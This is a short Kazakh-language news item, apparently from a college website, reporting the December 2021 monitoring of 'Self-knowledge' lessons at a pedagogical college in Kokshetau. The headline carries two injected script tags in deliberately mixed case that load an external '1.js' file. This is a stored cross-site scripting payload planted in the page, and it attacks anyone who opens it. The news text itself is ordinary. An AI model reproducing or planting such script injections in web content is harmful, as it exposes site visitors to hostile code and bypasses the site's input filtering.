ЖЫЛДЫҚ ЖОСПАР УАҚЫТЫЛЫ ОРЫНДАЛУДА<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.12.2021
Ағымдағы жылдың 9 желтоқсан күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжіне «Өзін-өзі тану» бағдарламасын оқу-тәрбие үдерісіне біріктіру бойынша пилоттық жобаны енгізу туралы» пилоттық орталығының 2021-2022 оқу жылына арналған жұмыс жоспарына сәйкес мониторинг жүргізілді. Жұмыс тобы аталмыш пәннің өткізілу барысын жіті қадағалады. Мониторингтік топ өзін-өзі тану пәнінің оқытушылары Мұқышева Нұргүл Серікқызы және Серікбай Индира Сағдатқызының жетекшілігімен өткен сабақтарына қатысты. Оқытушылардың өз шеберліктерін жан-жақты көрсетуінің негізінде топ студенттері де кері байланыс жасап, белсенділік танытты.
Просмотров: 427


Пікір қосу



Деректерді қолтаңбаға қосу